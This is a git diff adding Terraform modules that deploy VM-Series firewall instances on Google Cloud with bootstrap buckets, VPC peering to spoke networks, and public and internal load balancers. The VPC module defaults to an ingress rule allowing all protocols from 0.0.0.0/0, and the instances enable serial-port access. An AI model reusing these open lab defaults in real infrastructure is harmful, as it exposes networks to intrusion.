+  fw_subnetworks  = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"]
+
+  fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP
+  fw_nic1_ip = ["192.168.0.2", "192.168.0.3"]
+  fw_nic2_ip = ["192.168.2.2", "192.168.2.3"]
+
+  fw_bootstrap_bucket = "${module.bootstrap.bucket_name}"
+  fw_ssh_key          = "admin:${var.vmseries_ssh_key}"
+  fw_image            = "${var.vmseries_image}"
+
+  create_instance_group = true
+  instance_group_names  = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group"
+
+  dependencies = [
+    "${module.bootstrap.completion}",
+  ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER
+#************************************************************************************
+module "vmseries_public_lb" {
+  source = "./modules/create_public_lb/"
+  name   = "vmseries-lb"
+
+  backends = {
+    "0" = [
+      {
+        group = "${module.vm_fw.instance_group[0]}"
+      },
+      {
+        group = "${module.vm_fw.instance_group[1]}"
+      },
+    ]
+  }
+
+  backend_params = [
+    "/,http,80,10", // health check path, port name, port number, timeout seconds.
+  ]
+}
+
+#************************************************************************************
+# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2
+#************************************************************************************
+#resource "google_compute_route" "default" {
+#  count             = "${length(module.vm_fw.fw_names)}"
+#  name              = "default-to-${module.vm_fw.fw_names[count.index]}"
+#  dest_range        = "0.0.0.0/0"
+#  network           = "${module.vpc_trust.vpc_self_link}"
+#  next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}"
+#  priority          = 100
+#}
+
+#************************************************************************************
+# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2
+#************************************************************************************
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name         = "trust-to-spoke1"
+  network      = "${module.vpc_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke1.vpc_self_link}"
+
+  depends_on = [
+    "module.vm_spoke1","module.vm_spoke2"
+  ]
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+  name         = "trust-to-spoke2"
+  network      = "${module.vpc_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke2.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.trust_to_spoke1",
+  ]
+}
+#************************************************************************************
+# CREATE PEERING LINKS ILB-TRUST-to-SPOKE1 / TRUST-to-SPOKE2
+#************************************************************************************
+resource "google_compute_network_peering" "ilb_trust_to_spoke1" {
+  name         = "ilb-trust-to-spoke1"
+  network      = "${module.ilb_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke1.vpc_self_link}"
+
+  depends_on = [
+    "google_compute_network_peering.trust_to_spoke2",
+  ]
+}
+
+resource "google_compute_network_peering" "ilb_trust_to_spoke2" {
+  name         = "ilb-trust-to-spoke2"
+  network      = "${module.ilb_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke2.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.ilb_trust_to_spoke1",
+  ]
+}
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf
new file mode 100644
index 00000000..bfe60b19
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf
@@ -0,0 +1,120 @@
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable randomize_bucket_name {
+  default = false
+}
+
+locals {
+  bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+  count       = "${var.randomize_bucket_name}"
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  name          = "${local.bucket_name}"
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = "${length(var.config) > 0 ? length(var.config) : "0" }"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = "${length(var.content) > 0 ? length(var.content) : "0" }"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = "${length(var.license) > 0 ? length(var.license) : "0" }"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "software_full" {
+  count  = "${length(var.software) > 0 ? length(var.software) : "0" }"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+  count  = "${length(var.config) == 0 ? 1 : 0 }"
+  name   = "config/"
+  content = "config/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count  = "${length(var.content) == 0 ? 1 : 0 }"
+  name   = "content/"
+  content = "content/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count  = "${length(var.license) == 0 ? 1 : 0 }"
+  name   = "license/"
+  content = "license/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count  = "${length(var.software) == 0 ? 1 : 0 }"
+  name   = "software/"
+  content = "software/"
+  bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "google_storage_bucket.bootstrap",
+    "google_storage_bucket_object.config_full",
+    "google_storage_bucket_object.content_full",
+    "google_storage_bucket_object.license_full",
+    "google_storage_bucket_object.software_full",
+    "google_storage_bucket_object.config_empty",
+    "google_storage_bucket_object.content_empty",
+    "google_storage_bucket_object.license_empty",
+    "google_storage_bucket_object.software_empty",
+  ]
+}
+
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${google_storage_bucket.bootstrap.name}"
+}
diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
new file mode 100644
index 00000000..23092e2b
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
@@ -0,0 +1,124 @@
+variable enable_ilbnh {
+  default = false
+}
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable randomize_bucket_name {
+  default = false
+}
+
+locals {
+  bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+  count       = "${var.randomize_bucket_name}"
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  count         = "${var.enable_ilbnh ? 1 : 0}"
+  name          = "${local.bucket_name}"
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = "${(length(var.config) > 0 &&  var.enable_ilbnh) ? length(var.config) : "0" }"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = "${(length(var.content) > 0 &&  var.enable_ilbnh) ? length(var.content) : "0" }"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = "${(length(var.license) > 0 &&  var.enable_ilbnh) ? length(var.license) : "0" }"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "software_full" {
+  count  = "${(length(var.software) > 0 &&  var.enable_ilbnh) ? length(var.software) : "0" }"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+  count  = "${(length(var.config) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "config/"
+  content = "config/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count  = "${(length(var.content) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "content/"
+  content = "content/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count  = "${(length(var.license) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "license/"
+  content = "license/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count  = "${(length(var.software) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "software/"
+  content = "software/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "google_storage_bucket.bootstrap",
+    "google_storage_bucket_object.config_full",
+    "google_storage_bucket_object.content_full",
+    "google_storage_bucket_object.license_full",
+    "google_storage_bucket_object.software_full",
+    "google_storage_bucket_object.config_empty",
+    "google_storage_bucket_object.content_empty",
+    "google_storage_bucket_object.license_empty",
+    "google_storage_bucket_object.software_empty",
+  ]
+}
+
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
diff --git a/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf
new file mode 100644
index 00000000..49392b2e
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf
@@ -0,0 +1,51 @@
+variable enable_ilbnh {
+  default = false
+}
+variable "internal_lb_name_ilbnh" {
+  default = "ilbnh"
+}
+variable "internal_lb_ports_ilbnh" {
+  default = "22"
+}
+variable backends {
+  description = "Map backend indices to list of backend maps."
+  type        = "list"
+}
+variable subnetworks {
+    type = "list"
+}
+variable "internal_lbnh_ip" {
+  default = ""
+}
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+resource "google_compute_health_check" "health_check_ilbnh" {
+  name  = "${var.internal_lb_name_ilbnh}-check"
+  count = "${var.enable_ilbnh ? 1 : 0}"
+
+  tcp_health_check {
+    port = "${var.internal_lb_ports_ilbnh}"
+  }
+}
+
+resource "google_compute_region_backend_service" "backend_service_ilbnh" {
+  name              = "${var.internal_lb_name_ilbnh}"
+  count             = "${var.enable_ilbnh ? 1 : 0}"
+  health_checks     = ["${google_compute_health_check.health_check_ilbnh.self_link}"]
+  backend           = ["${var.backends}"] 
+  session_affinity  = "CLIENT_IP"
+
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" {
+  name                  = "${var.internal_lb_name_ilbnh}-all"
+  count                 = "${var.enable_ilbnh ? 1 : 0}"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = "${var.internal_lbnh_ip}"
+  ip_protocol           = "TCP"
+  all_ports             = true
+  subnetwork            = "${var.subnetworks[0]}"
+  backend_service       = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}"
+}
diff --git a/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf
new file mode 100644
index 00000000..961faca1
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf
@@ -0,0 +1,168 @@
+
+variable project {
+  description = "The project to deploy to, if not set the default provider project is used."
+  default     = ""
+}
+
+variable ip_version {
+  description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+  default     = ""
+}
+
+variable name {
+  description = "Name for the forwarding rule and prefix for supporting resources"
+}
+
+variable backends {
+  description = "Map backend indices to list of backend maps."
+  type        = "map"
+}
+
+variable backend_params {
+  description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+  type        = "list"
+}
+
+variable backend_protocol {
+  description = "The protocol with which to talk to the backend service"
+  default     = "HTTP"
+}
+
+variable create_url_map {
+  description = "Set to `false` if url_map variable is provided."
+  default     = true
+}
+
+variable url_map {
+  description = "The url_map resource to use. Default is to send all traffic to first backend."
+  default     = ""
+}
+
+variable http_forward {
+  description = "Set to `false` to disable HTTP port 80 forward"
+  default     = true
+}
+
+variable ssl {
+  description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+  default     = false
+}
+
+variable private_key {
+  description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  default     = ""
+}
+
+variable certificate {
+  description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  default     = ""
+}
+
+variable use_ssl_certificates {
+  description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+  default     = false
+}
+
+variable ssl_certificates {
+  type        = "list"
+  description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+  default     = []
+}
+
+variable security_policy {
+  description = "The resource URL for the security policy to associate with the backend service"
+  default     = ""
+}
+
+variable cdn {
+  description = "Set to `true` to enable cdn on backend."
+  default     = "false"
+}
+
+
+resource "google_compute_global_forwarding_rule" "http" {
+  project    = "${var.project}"
+  count      = "${var.http_forward ? 1 : 0}"
+  name       = "${var.name}"
+  target     = "${google_compute_target_http_proxy.default.self_link}"
+  ip_address = "${google_compute_global_address.default.address}"
+  port_range = "80"
+  depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+  project    = "${var.project}"
+  count      = "${var.ssl ? 1 : 0}"
+  name       = "${var.name}-https"
+  target     = "${google_compute_target_https_proxy.default.self_link}"
+  ip_address = "${google_compute_global_address.default.address}"
+  port_range = "443"
+  depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_address" "default" {
+  project    = "${var.project}"
+  name       = "${var.name}-address"
+  ip_version = "${var.ip_version}"
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+  project = "${var.project}"
+  count   = "${var.http_forward ? 1 : 0}"
+  name    = "${var.name}-http-proxy"
+  url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+}
+
+# HTTPS proxy  when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+  project          = "${var.project}"
+  count            = "${var.ssl ? 1 : 0}"
+  name             = "${var.name}-https-proxy"
+  url_map          = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+  ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"]
+}
+
+resource "google_compute_ssl_certificate" "default" {
+  project     = "${var.project}"
+  count       = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}"
+  name_prefix = "${var.name}-certificate-"
+  private_key = "${var.private_key}"
+  certificate = "${var.certificate}"
+
+  lifecycle = {
+    create_before_destroy = true
+  }
+}
+
+resource "google_compute_url_map" "default" {
+  project         = "${var.project}"
+  count           = "${var.create_url_map ? 1 : 0}"
+  name            = "${var.name}"
+  default_service = "${google_compute_backend_service.default.0.self_link}"
+}
+
+resource "google_compute_backend_service" "default" {
+  project         = "${var.project}"
+  count           = "${length(var.backend_params)}"
+  name            = "${var.name}-backend-${count.index}"
+  port_name       = "${element(split(",", element(var.backend_params, count.index)), 1)}"
+  protocol        = "${var.backend_protocol}"
+  timeout_sec     = "${element(split(",", element(var.backend_params, count.index)), 3)}"
+  backend         = ["${var.backends["${count.index}"]}"]
+  health_checks   = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"]
+  security_policy = "${var.security_policy}"
+  enable_cdn      = "${var.cdn}"
+}
+
+resource "google_compute_http_health_check" "default" {
+  project      = "${var.project}"
+  count        = "${length(var.backend_params)}"
+  name         = "${var.name}-check-${count.index}"
+  request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}"
+  port         = "${element(split(",", element(var.backend_params, count.index)), 2)}"
+}
+
+output "address" {
+  value = "${google_compute_global_address.default.address}"
+}
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf
new file mode 100644
index 00000000..dd140b46
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf
@@ -0,0 +1,127 @@
+variable vm_names {
+    type = "list"
+}
+variable vm_machine_type {}
+variable vm_zones {
+  type = "list"
+}
+variable vm_ssh_key {}
+
+variable vm_image {}
+variable vm_subnetworks {
+    type = "list"
+}
+
+variable vm_scopes {
+  type = "list"
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+
+variable internal_lb_create {
+  default = false
+}
+
+variable "internal_lb_health_check" {
+  default = "22"
+}
+
+variable "internal_lb_ports" {
+  type    = "list"
+  default = ["80"]
+}
+
+variable "internal_lb_name" {
+  default = "intlb"
+}
+
+variable "internal_lb_ip" {
+  default = ""
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable startup_script {
+default = ""
+}
+
+
+resource "google_compute_instance" "vm" {
+  count         = "${length(var.vm_names)}"
+  name          = "${element(var.vm_names, count.index)}"
+  machine_type              = "${var.vm_machine_type}"
+  zone                      = "${element(var.vm_zones, count.index)}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata_startup_script   = "${var.startup_script}"
+
+
+  metadata {
+    serial-port-enable = true
+    sshKeys            = "${var.vm_ssh_key}"
+  }
+
+  network_interface {
+    subnetwork = "${element(var.vm_subnetworks, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.vm_image}"
+    }
+  }
+
+  service_account {
+    scopes = "${var.vm_scopes}"
+  }
+}
+
+resource "google_compute_instance_group" "instance_group" {
+  count = "${var.internal_lb_create}"
+  name  = "${var.internal_lb_name}-group"
+  zone  = "${var.vm_zones[0]}"
+
+  instances = [
+    "${google_compute_instance.vm.*.self_link}",
+  ]
+}
+
+
+
+
+resource "google_compute_health_check" "health_check" {
+  count = "${var.internal_lb_create}"
+  name  = "${var.internal_lb_name}-check-${count.index}"
+
+  tcp_health_check {
+    port = "${var.internal_lb_ports[0]}"
+  }
+}
+
+resource "google_compute_region_backend_service" "backend_service" {
+  count         = "${var.internal_lb_create}"
+  name          = "${var.internal_lb_name}-backend-${count.index}"
+  health_checks = ["${google_compute_health_check.health_check.self_link}"]
+
+  backend {
+    group = "${google_compute_instance_group.instance_group.self_link}"
+  }
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule" {
+  count                 = "${var.internal_lb_create}"
+  name                  = "${var.internal_lb_name}-tcp"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = "${var.internal_lb_ip}"
+  ports                 = "${var.internal_lb_ports}"
+  subnetwork            = "${var.vm_subnetworks[0]}"
+  backend_service       = "${google_compute_region_backend_service.backend_service.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf
new file mode 100644
index 00000000..8a87285a
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf
@@ -0,0 +1,176 @@
+variable fw_subnetworks {
+  type = "list"
+}
+
+variable fw_names {
+  type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+  type = "list"
+}
+
+variable fw_cpu_platform {
+  default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+  default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+  default = false
+}
+
+variable fw_scopes {
+  type = "list"
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+  type    = "list"
+  default = []
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable instance_group_names {
+  type    = "list"
+  default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic0_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic1_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic2_ip {
+  type    = "list"
+  default = []
+}
+
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#************************************************************************************
+# CREATE VMSERIES 
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+  count                     = "${length(var.fw_names)}"
+  name                      = "${element(var.fw_names, count.index)}"
+  machine_type              = "${var.fw_machine_type}"
+  zone                      = "${element(var.fw_zones, count.index)}"
+  min_cpu_platform          = "${var.fw_cpu_platform}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = "${var.fw_tags}"
+
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+    serial-port-enable                   = true
+    sshKeys                              = "${var.fw_ssh_key}"
+  }
+
+  service_account {
+    scopes = "${var.fw_scopes}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[0]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic0_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[1]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic1_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork = "${var.fw_subnetworks[2]}"
+    network_ip = "${element(var.fw_nic2_ip, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.fw_image}"
+    }
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+  count     = "${(var.create_instance_group) ? length(var.fw_names) : 0}"
+  name      = "${element(var.instance_group_names, count.index)}"
+  zone      = "${element(var.fw_zones, count.index)}"
+  instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+}
+
+
+
+
+
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+  value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+  value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+  value = "${google_compute_instance_group.vmseries.*.self_link}"
+}
+
+
+output "fw_nic0_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf
new file mode 100644
index 00000000..87300c85
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf
@@ -0,0 +1,173 @@
+variable enable_ilbnh {
+  default = true
+}
+variable fw_subnetworks {
+  type = "list"
+}
+
+variable fw_names {
+  type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+  type = "list"
+}
+
+variable fw_cpu_platform {
+  default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+  default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+  default = false
+}
+
+variable fw_scopes {
+  type = "list"
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+  type    = "list"
+  default = []
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable instance_group_names {
+  type    = "list"
+  default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic0_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic1_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic2_ip {
+  type    = "list"
+  default = []
+}
+variable instance_group {
+  type = "list"
+  default = []
+}
+
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#************************************************************************************
+# CREATE VMSERIES 
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+  count                     = "${(length(var.fw_names) > 0 &&  var.enable_ilbnh) ? length(var.fw_names) : "0" }"
+  name                      = "${element(var.fw_names, count.index)}"
+  machine_type              = "${var.fw_machine_type}"
+  zone                      = "${element(var.fw_zones, count.index)}"
+  min_cpu_platform          = "${var.fw_cpu_platform}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = "${var.fw_tags}"
+
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+    serial-port-enable                   = true
+    sshKeys                              = "${var.fw_ssh_key}"
+  }
+
+  service_account {
+    scopes = "${var.fw_scopes}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[0]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic0_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[1]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic1_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[2]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic2_ip, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.fw_image}"
+    }
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+  count     = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}"
+  name      = "${element(var.instance_group_names, count.index)}"
+  zone      = "${element(var.fw_zones, count.index)}"
+  instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+}
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+  value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+  value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+  value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}"
+}
+
+output "fw_nic0_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
diff --git a/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf
new file mode 100644
index 00000000..e4511595
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf
@@ -0,0 +1,71 @@
+variable vpc_name {}
+
+variable subnetworks {
+  type = "list"
+}
+
+variable ip_cidrs {
+  type = "list"
+}
+
+variable regions {
+  type = "list"
+}
+
+variable ingress_allow_all {
+  default = true
+}
+
+variable ingress_sources {
+  type    = "list"
+  default = ["0.0.0.0/0"]
+}
+
+resource "google_compute_network" "default" {
+  name                    = "${var.vpc_name}"
+  auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+  count         = "${length(var.subnetworks)}"
+  name          = "${element(var.subnetworks, count.index)}"
+  ip_cidr_range = "${element(var.ip_cidrs, count.index)}"
+  region        = "${element(var.regions, count.index)}"
+  network       = "${google_compute_network.default.self_link}"
+}
+
+resource "google_compute_firewall" "ingress_all" {
+  count         = "${var.ingress_allow_all}"
+  name          = "${google_compute_network.default.name}-ingress-all"
+  network       = "${google_compute_network.default.self_link}"
+  direction     = "INGRESS"
+  source_ranges = "${var.ingress_sources}"
+
+  allow {
+    protocol = "all"
+  }
+}
+
